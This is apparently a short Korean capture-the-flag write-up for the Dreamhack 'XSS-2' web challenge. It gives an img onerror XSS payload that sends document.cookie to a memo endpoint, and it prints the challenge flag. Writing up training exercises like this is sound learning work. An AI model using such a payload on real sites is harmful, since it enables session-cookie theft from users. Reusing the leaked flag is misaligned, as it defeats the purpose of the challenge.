XSS-2
2024. 5. 25. 00:28ㆍ웹 해킹/Dreamhack Wargame
XSS 취약점을 활용해 FLAG를 획득하는 문제
1. XSS-1과 같은 URL이지만 이번에는 스크립트가 작동하지 않는다
2. 그럼 XSS를 발생시킬 수 있는 <script>태그가 아닌 다른 태그를 사용한다
3. <img src=x onerror=location.href=”/memo?memo=”+document.cookie> 코드 입력
flag=DH{3c01577e9542ec24d68ba0ffb846508f}
'웹 해킹 > Dreamhack Wargame' 카테고리의 다른 글
sql injection bypass WAF (0) | 2024.05.26 |
---|---|
simple_sqli_chatgpt (0) | 2024.05.26 |
XSS Filtering Bypass Advanced (0) | 2024.05.25 |
XSS Filtering Bypass (0) | 2024.05.25 |
XSS-1 (0) | 2024.05.25 |